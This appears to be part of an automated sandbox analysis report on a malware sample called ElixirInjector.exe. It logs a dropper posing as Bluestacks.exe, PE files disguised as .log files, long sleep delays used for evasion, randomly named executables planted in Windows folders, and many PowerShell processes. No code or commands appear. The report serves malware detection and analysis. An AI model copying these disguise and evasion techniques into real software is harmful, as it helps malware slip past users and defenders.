Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EbKwZRsK.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wxCHpYcd.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VHSMlJrg.log	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -599703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -599587s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -599484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -599375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -99546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -99436s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -99325s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -99214s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -98891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -98766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -98641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -98530s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -98419s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -98312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -98203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -98094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -97984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -97874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -97764s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -97646s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -97516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -97406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -596608s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -596218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -595451s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 4344	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 5100	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe TID: 1668	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\ShellComponents\cmd.exe TID: 6772	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\ShellComponents\cmd.exe TID: 6848	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe TID: 8580	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392	Thread sleep count: 1972 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8500	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8252	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604	Thread sleep count: 1369 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8540	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8224	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608	Thread sleep count: 1453 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8524	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8240	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864	Thread sleep count: 1234 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8488	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840	Thread sleep count: 1457 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8536	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8292	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780	Thread sleep count: 1672 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8528	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8276	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752	Thread sleep count: 1671 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8560	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8268	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772	Thread sleep count: 1561 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8552	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5392	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836	Thread sleep count: 1396 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8496	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8300	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888	Thread sleep count: 1324 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8520	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8284	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916	Thread sleep count: 1403 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8556	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892	Thread sleep count: 1240 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8532	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8316	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912	Thread sleep count: 1321 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8516	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8232	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924	Thread sleep count: 1663 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8256	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920	Thread sleep count: 1478 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8504	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8324	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016	Thread sleep count: 1673 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8508	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8332	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120	Thread sleep count: 1476 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8548	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8348	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116	Thread sleep count: 1453 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8568	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8340	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe TID: 8492	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe TID: 8732	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe TID: 9028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe TID: 4020	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\ShellComponents\cmd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\ShellComponents\cmd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F1A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00F1A69B
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F2C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00F2C220
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F3B348 FindFirstFileExA,	0_2_00F3B348

Source: C:\Users\user\Desktop\ElixirInjector.exe

Code function: 0_2_00F2E6A3 VirtualQuery,GetSystemInfo,

0_2_00F2E6A3

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 599703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 599587	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 99546	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 99436	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 99325	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 99214	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 98891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 98766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 98641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 98530	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 98419	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 98312	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 98203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 98094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 97984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 97874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 97764	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 97646	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 97516	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 97406	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 596608	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 595451	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\ShellComponents\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\ShellComponents\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\ElixirInjector.exe	File opened: C:\Users\user\AppData\Local\Temp\WinRAR\	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	File opened: C:\Users\user\AppData\Local\Temp\WinRAR\data\	Jump to behavior
